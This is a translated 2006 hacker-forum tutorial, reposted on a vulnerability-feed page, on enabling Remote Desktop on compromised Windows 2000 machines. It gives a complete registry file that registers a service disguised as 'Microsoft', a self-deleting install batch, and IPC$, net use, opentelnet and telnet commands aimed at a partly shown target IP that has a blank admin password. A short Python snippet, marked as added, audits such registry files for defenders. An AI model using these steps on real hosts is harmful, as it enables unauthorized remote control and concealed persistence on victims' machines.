Opening 3389 under Win Pro! - Vulnerability warning - the black bar safety net

ID MYHACK58:62200610272
Type myhack58
Reporter Anonymous
Modified 2006-07-08T00:00:00


This post was reposted from the Banyan brother forum; whether it is original is unclear.

Installing 3389 Terminal Services on win2000 Professional Edition

It is well known that windows2000 Professional does not support 3389 Terminal Services, so if the meat machine (compromised host) whose administrator password we obtained runs this version, we could only give up the idea of installing Terminal Services. But now Terminal Services can be installed on the Professional version! The method is as follows:

1. Change the Professional version to the server version
2. Install Terminal Services

With regard to the details of installing Terminal Services, there are already many excellent articles on the network, so they are not repeated here.

Below we talk about how to change the Professional version to the server version:

Principle: in fact, the various versions of windows 2000 all use the same programs and dynamic link libraries; the biggest difference among them is in the registry. The windows2000 three-in-one disc is proof of that. So as long as the relevant registry entries of the Professional edition are changed to those of the server and above versions, Terminal Services can be installed on the Professional version.

Now 3am Laboratories has turned the method of changing the win2000 version into a very easy-to-use piece of software: NTSwitch, which lets us change the version freely and quickly. This software can be downloaded from the small Phoenix center; the download address is a URL

Possibly due to pressure from Microsoft, 3am Laboratories has removed this software from its home page, so download it quickly!

Specific methods for changing the version remotely:

Method 1:

1. On the remote meat machine, run a remote control program that supports a graphical interface, such as Glacier, PcAnyWhere, etc.
2. Through the remote control, download and run NTSwitch to change the version
3. Install 3389 Terminal Services

This method is very convenient and keeps the technical requirements to a minimum. But the other side can see the entire operation, which is very dangerous!

Method 2:

1. Change your own local win2000 professional to win2000 server Edition, and use registry comparison software to compare the registry before and after the version change. Make the difference into a chang.reg file.
2. Using the administrator password obtained for the meat machine, open the Telnet service on the meat machine.
3. Telnet to the meat machine and use the regedit.exe /s chang.reg command to change the remote registry, which changes the remote win2000 version.

This method requires some experience, but the operation is very safe. And you can use the“lost vb”method to go on to install 3389 Terminal Services.

The following is the“stray vb”method of installing the 3389 terminal service

========================

First, we make the tool that opens 3389.

First copy the following registry contents and save them as the registry file 3389.reg

Registry contents:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\netcache]
    "Enabled"="0"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows NT\CurrentVersion\Winlogon]
    "ShutdownWithoutLogon"="0"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\microsoft\windows\installer]
    "EnableAdminTSRemote"=dword:00000001

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\control\terminal Server]
    "TSEnabled"=dword:00000001

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\services\termdd]
    "Start"=dword:00000002

    [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
    "Hotkey"="1"

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\services\secuservice]
    "Start"=dword:00000002
    "ErrorControl"=dword:00000001
    "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
      74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
      00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
    "ObjectName"="LocalSystem"
    "Type"=dword:00000010
    "Description"="Microsoft"
    "DisplayName"="Microsoft"

Then save the following content as the batch file 3389.bat

Installation batch content:

    copy termsrv.exe eventlog.exe
    regedit.exe /s 3389.reg
    del 3389.reg
    del 3389.exe
    del 3389.bat

Use winrar to make it into an exe self-extracting package.
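An added example, not part of the original post: a defender-side audit, in Python, of a .reg file like the one described above. It decodes the hex(2) ImagePath and reports Terminal Services being enabled and any auto-start service missing from a known-good baseline; the function names and the baseline_services parameter are assumptions of this example.

```python
import re
# Constructed sample: two entries taken from the 3389.reg contents described above.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\control\terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\services\secuservice]
"Start"=dword:00000002
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
  00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="Microsoft"
'''

def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: decoded_value}}."""
    text = re.sub(r'\\\r?\n\s*', '', text)   # join hex continuation lines
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            current = keys.setdefault(line[1:-1], {})
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if not m or current is None:
            continue
        name, raw = m.groups()
        if raw.startswith('dword:'):
            current[name] = int(raw[6:], 16)
        elif raw.startswith('hex(2):'):      # REG_EXPAND_SZ stored as UTF-16LE bytes
            data = bytes.fromhex(raw[7:].replace(',', ''))
            current[name] = data.decode('utf-16-le').rstrip('\x00')
        else:
            current[name] = raw.strip('"')
    return keys

def audit(text, baseline_services=frozenset()):
    """Report Terminal Services enablement and auto-start services not in the baseline."""
    findings = []
    for key, vals in parse_reg(text).items():
        low = key.lower()
        if low.endswith('\\control\\terminal server') and vals.get('TSEnabled') == 1:
            findings.append(('ts_enabled', key))
        if '\\services\\' in low and vals.get('Start') == 2 and 'ImagePath' in vals:
            svc = low.rsplit('\\', 1)[1]
            if svc not in baseline_services:   # baseline is supplied by the defender
                findings.append(('new_autostart_service', svc, vals['ImagePath']))
    return findings
```

Run on the sample, the decoded ImagePath shows that the "secuservice" entry starts eventlog.exe, the name the batch file gives to its copy of termsrv.exe.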

61.188.. user:administrato pass:empty

First use the tool letmein to determine its operating system:

    letmein \\ip -all -d
    TsInternetUser

(TsInternetUser) is the 2000 terminal user, so we can now determine that it is 2000 Server.

Then use the terminal login software to check whether its 3389 is already open, to save ourselves the trouble. It should not be turned on.

Establish an IPC connection and copy the tools over:

    net use \\ip\ipc$ "password" /user:name
    copy the file \\ip\admin$\system32

Use opentelnet to open telnet on the other side:

    opentelnet \\ip name pass 1 99

Use telnet to get in. Go into the winnt\system32 directory on the other side, extract 3389.exe, and run the installation batch 3389.bat.

Now we restart the other side, with reboot.

We use the ping command to monitor whether it is online. It goes offline, then comes back up. Do not rush to connect; 3389 will be ready after a while, since the other machine is a bit slow.

There it is, it opened successfully!